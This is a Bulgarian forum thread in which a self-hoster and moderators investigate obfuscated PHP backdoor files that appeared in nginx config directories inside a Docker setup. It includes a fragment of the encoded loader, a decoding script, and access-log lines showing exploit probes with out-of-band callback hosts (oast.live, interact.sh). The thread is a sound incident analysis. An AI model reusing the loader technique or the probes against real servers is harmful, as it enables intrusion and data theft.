грешка в лога на nginx под docker

sharpshooter

Registered
Здравейте, от известно време забелязвам грешка в лога на nginx, която пречи на работата на няколко уеб сървиса - plex, nextcloud, wordpress и други, които общо взето се проксират през nginx.
Може ли някой да помогне?
Код:
nginx: [crit] pread() "/config/nginx/site-confs/xt" failed (21: Is a directory)
В тази директория имам index.php със следното съдържание, ако изобщо е от значение:
Код:
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5>
 

anonimen

Super Moderator
Това не прилича да е цялото съдържание на index.php, ако всичко е наред. През декодер като пуснах тоя стринг, който е подаден на base64 decode, излезе това:

if(!function_exists("YiunIUY76bBhuhNYIO8")){fun

Изобщо evalът е доста подозрителен.. ако пуснеш целия index php, може би ще се види дали има нещо притеснително в eval'uateнатия код.
Някакви други странни неща да си забелязвал?
 

sharpshooter

Registered
Извинявяйте, не се съобразих, че ще трябва целият файл. Ето го:
Иначе не съм забелязал нещо странно, но си признавам, че не съм гледал от много време лог файлове.
 

anonimen

Super Moderator
Декодиран, файлът съдържа eval на този код:

PHP:
<?php
if (!function_exists("YiunIUY76bBhuhNYIO8"))
{
    function YiunIUY76bBhuhNYIO8($g, $b = 0)
    {
        $a = implode("\n", $g);
        $d = array(
            655,
            236,
            40
        );
        if ($b == 0) $f = substr($a, $d[0], $d[1]);
        elseif ($b == 1) $f = substr($a, $d[0] + $d[1], $d[2]);
        else $f = trim(substr($a, $d[0] + $d[1] + $d[2]));
        return ($f);
    }
}

Не знам какво може да е това.

Само че, като гледам каква е грешката, почвам да се съмнявам, че конкретно съдържанието на файла е от значение.
 

sharpshooter

Registered
Аз също не мисля, че съдържанието е проблем. Въпросът е, че това съдържание го нямаше преди време.

Тази директория изобщо не ми е позната и тя съществува във всяка една поддиректория на ngnix. А същата тази директория я има в грешката. Започвам да се притеснявам, че нещо лошо се е случило.
 

anonimen

Super Moderator
Тази директория изобщо не ми е позната и тя съществува във всяка една поддиректория на ngnix. А същата тази директория я има в грешката. Започвам да се притеснявам, че нещо лошо се е случило.
Аз именно това питах, има ли нещо друго странно. Щом я има същата във всяка директория, звучи като някой злонамерен да ги е нафлякал. Според мен виж и за други съмнителни новопоявили се папки/файлове.
 

deam0n

Super Moderator
Определено изглежда като нещо, което не трябва да е там.
 

sharpshooter

Registered
Аз именно това питах, има ли нещо друго странно. Щом я има същата във всяка директория, звучи като някой злонамерен да ги е нафлякал. Според мен виж и за други съмнителни новопоявили се папки/файлове.
Къде предлагаш да видя за такива - в директорияра на Nginx или?
 

Revelation

Super Moderator
Декодиран, файлът съдържа eval на този код:

PHP:
<?php
if (!function_exists("YiunIUY76bBhuhNYIO8"))
{
    function YiunIUY76bBhuhNYIO8($g, $b = 0)
    {
        $a = implode("\n", $g);
        $d = array(
            655,
            236,
            40
        );
        if ($b == 0) $f = substr($a, $d[0], $d[1]);
        elseif ($b == 1) $f = substr($a, $d[0] + $d[1], $d[2]);
        else $f = trim(substr($a, $d[0] + $d[1] + $d[2]));
        return ($f);
    }
}

Не знам какво може да е това.

Само че, като гледам каква е грешката, почвам да се съмнявам, че конкретно съдържанието на файла е от значение.
Не е само това вътре. Има няколко функции вътре. Тази конкретно изтрива началото от този файл, който реално съдържа тези функции, след това има __halt_compiler(); за да предотврати PHP парсера да парсва бинарния код след __halt_compiler(), който е реално кода, който се изпълнява. Кода е нечетим, защото една от функциите компресира съдържанието и след това го декомпресира и изпълнява.

Този номер се използва за намаляне на размера на инсталационни файлове, както и malware. Има вероятност компресирания код да ти ходи по цялата файлова система рекурсивно и да изпраща разни файлчета напред назад... Предвид, че се намира няколко пъти в директорията на nginx, ме съмнява това да са инсталационни файлове на PHP разширения.

Ще се опитам да разбера какъв точно е скрипта, който се изпълнява.

Ако смяташ, че в другите файлове има различен код, то го дай и него да видим какво има (ако успея да изкарам кода).
 

sharpshooter

Registered
Благодаря ти много за отделеното времето, наистина!

Хората поддържащи nginx контейнера споделиха, че тези php файлове може да са mining software.

Иначе ето и още няколко файла от xt директориите:
https://paste.kodi.tv/movapobeke - основната директория в конфига на nginx
https://paste.kodi.tv/esofoguyoq - proxy-confs директорията

Ако има някаква разлика, ще намеря и другите директории.

За съжаление е вероятно да е компрометиран целия хост, а не само контейнера.
 

Revelation

Super Moderator
Всичко е възможно. Ако е mining software можеш да ръннеш
Bash:
docker stats
да видиш дали използва много CPU. Както и
Bash:
docker top <container>
за да видиш дали има някакви съмнителни процеси вървящи в контейнера.
 

sharpshooter

Registered
Хм, благодаря ти! Имам един контейнер droppy, който е за споделяне на файлове. Всичко беше наред, докато не го стартирах - сега той работи на 68.87% , всичко друго по-сериозно е на 1-2% макс.

Ето още нещо интересно от лога на този контейнер:
Стартира се някакъв процес, който съдържа http://interact.sh/ и обяснението е следното:
This tool can generate specific domain names to help its users test whether an exploit is successful.
В лога забелязвам и някакъв домейн пак от същото IP:
2022-06-05 00:48:18 [INFO] 176.113.115.238:34090 GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://caatb5ho6n6agto00010ekwgheiuas916.oast.live [401] [1ms],

Ето процеса:
Код:
2022-05-20 04:36:17 [INFO] 176.113.115.238:50994 GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://interact.sh/ [400] [0ms] Invalid GET: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://interact.sh/,
EDIT: Май това с процеса не е много вярно за droppy, защото и nginx вдигна 120%, когато го стартирам. Не знам дали е нормално, но...
 
Последно редактирано:

Revelation

Super Moderator
Ето какво изкочи от първия файл:


На който му се чете да чете :D

П.П. Набързо се зачетох... това ти чете най-важните файлове от файловата система. Понеже си в контейнер, вероятно нищо важно няма да излезе, но все пак... това си е чиста вратичка.

Както предполагах, има код за рекурсивно четене на директориите и има някакви функции за теглене... даже като гледам си е улеснил живота да може директно да си изобрази съдържанието на файловете директно в страничката, която си е отворил тайно.
 
Последно редактирано:

Revelation

Super Moderator
Проверих и другите файлове. Съдържанието е едно и също.

Ето и кода, който използвах да ги екстрактна. Преизползвах вътрешните функциите, така че едва ли ще работи за други такива освен, ако не са генерирани от същото място понеже началната част си е бойлерплейт код да рънне реалния код.
PHP:
<?php
function findImportantStuff($g, $b = 0)
{
    $a = implode("\n", $g);
    $d = array(
        655,
        236,
        40
    );
    if ($b == 0) $f = substr($a, $d[0], $d[1]);
    elseif ($b == 1) $f = substr($a, $d[0] + $d[1], $d[2]);
    else $f = trim(substr($a, $d[0] + $d[1] + $d[2]));
    return ($f);
}

function showRealContent($phpFileContent)
{
    // imitates file()
    $contentAsArray = [$phpFileContent];
   
    $uncompressed = gzinflate(base64_decode(findImportantStuff($contentAsArray, 2)));

    preg_match('#eval.*\("(.*?)"\)#', $uncompressed, $matches);

    return utf8_encode(base64_decode($matches[1]));
}

echo showRealContent(<<<'T'
<?php /*** PHP Encode v1.0 by zeura.com ***/...останалата част от файла...
T
);
 
Последно редактирано:

sharpshooter

Registered
Благодаря много за всичко!

Това означава ли, че трябва да изтрия всичко от сървъра? И дали има инфектирани файлове?
Всъщност той nginx ли използва за да си визуализира файловете? Просто още не мога да си представя какво е станало.
 

uphero

Registered
Преди да триеш каквото и да било прегледай логовете за да разбереш кога и най-вече как са се появили тия файлове.
 

sharpshooter

Registered
ОК, ще опитам, но има адски много информация в логовете, ще трябва да я синтезирам по някакъв начин.
Ще опитам по този начин да видим дали ще намеря нещо:

Оказа се, че droppy има някаква Path Traversal уязвимост и май от там е проблемът. Нали, щом се проксира през nginx, би трябвало да се види в лога на nginx, ако е нещо свързано с droppy?
 

sharpshooter

Registered
Ако на някой му е интересно, ето всички файлове, които са създадени:
Оказа се, че WordPress е дупката.
 

Горе